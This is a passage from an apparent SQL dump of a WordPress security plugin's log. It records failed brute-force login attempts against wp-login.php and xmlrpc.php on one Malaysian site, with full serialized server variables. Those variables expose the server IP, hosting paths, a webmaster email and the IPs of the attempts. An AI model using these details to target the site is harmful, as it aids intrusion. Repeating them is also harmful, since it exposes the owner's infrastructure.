empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"54.66.133.13\";s:11:\"REMOTE_PORT\";s:5:\"46714\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYM@CDeXPjITQfYLwk4YJAAAAIg\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568882184.4354\";s:12:\"REQUEST_TIME\";s:10:\"1568882184\";}}','notice','2019-09-19 08:36:25','2019-09-19 08:36:24',18256848,19554376,'https://bintara.com.my/xmlrpc.php',1,0,'54.66.133.13'),(25135,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"148.72.23.181\";s:11:\"REMOTE_PORT\";s:5:\"32820\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYNBZjeXPjITQfYLwk4Z5gAAAIs\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568883046.9539\";s:12:\"REQUEST_TIME\";s:10:\"1568883046\";}}','notice','2019-09-19 08:50:48','2019-09-19 08:50:47',17739784,19232224,'https://bintara.com.my/wp-login.php',1,0,'148.72.23.181'),(25136,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"148.72.23.181\";s:11:\"REMOTE_PORT\";s:5:\"33362\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYNBatd7mFxrJDg7xkLuYQAAAE8\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568883050.6043\";s:12:\"REQUEST_TIME\";s:10:\"1568883050\";}}','notice','2019-09-19 08:50:52','2019-09-19 08:50:51',18259240,19556536,'https://bintara.com.my/xmlrpc.php',1,0,'148.72.23.181'),(25137,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"46.101.143.24\";s:11:\"REMOTE_PORT\";s:5:\"37624\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYNIVTeXPjITQfYLwk4coQAAAIk\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568884822.0981\";s:12:\"REQUEST_TIME\";s:10:\"1568884822\";}}','notice','2019-09-19 09:20:23','2019-09-19 09:20:22',17739656,19230800,'https://bintara.com.my/wp-login.php',1,0,'46.101.143.24'),(25138,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"46.101.143.24\";s:11:\"REMOTE_PORT\";s:5:\"38780\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYNIXh1AWtxZyz0ToGmKRAAAABY\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568884830.5469\";s:12:\"REQUEST_TIME\";s:10:\"1568884830\";}}','notice','2019-09-19 09:20:32','2019-09-19 09:20:30',18258656,19557200,'https://bintara.com.my/xmlrpc.php',1,0,'46.101.143.24'),(25139,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"89\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"213.122.172.69\";s:11:\"REMOTE_PORT\";s:5:\"33603\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYNL1zeXPjITQfYLwk4dsAAAAJQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568885720.0021\";s:12:\"REQUEST_TIME\";s:10:\"1568885720\";}}','notice','2019-09-19 09:35:21','2019-09-19 09:35:20',17740960,19231192,'https://bintara.com.my/wp-login.php',1,0,'213.122.172.69'),(25140,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"213.122.172.69\";s:11:\"REMOTE_PORT\";s:5:\"34215\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYNL29Ahg@A20WI2ffiHjgAAARY\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568885723.6294\";s:12:\"REQUEST_TIME\";s:10:\"1568885723\";}}','notice','2019-09-19 09:35:26','2019-09-19 09:35:24',18257680,19554224,'https://bintara.com.my/xmlrpc.php',1,0,'213.122.172.69'),(25141,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"104.236.100.42\";s:11:\"REMOTE_PORT\";s:5:\"55962\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYNPG9d7mFxrJDg7xkLxYQAAAFc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568886555.6398\";s:12:\"REQUEST_TIME\";s:10:\"1568886555\";}}','notice','2019-09-19 09:49:17','2019-09-19 09:49:16',17740512,19232976,'https://bintara.com.my/wp-login.php',1,0,'104.236.100.42'),(25142,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"104.236.100.42\";s:11:\"REMOTE_PORT\";s:5:\"56616\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYNPHh1AWtxZyz0ToGmMBgAAAAk\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568886558.837\";s:12:\"REQUEST_TIME\";s:10:\"1568886558\";}}','notice','2019-09-19 09:49:20','2019-09-19 09:49:19',18257680,19554224,'https://bintara.com.my/xmlrpc.php',1,0,'104.236.100.42'),(25143,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is 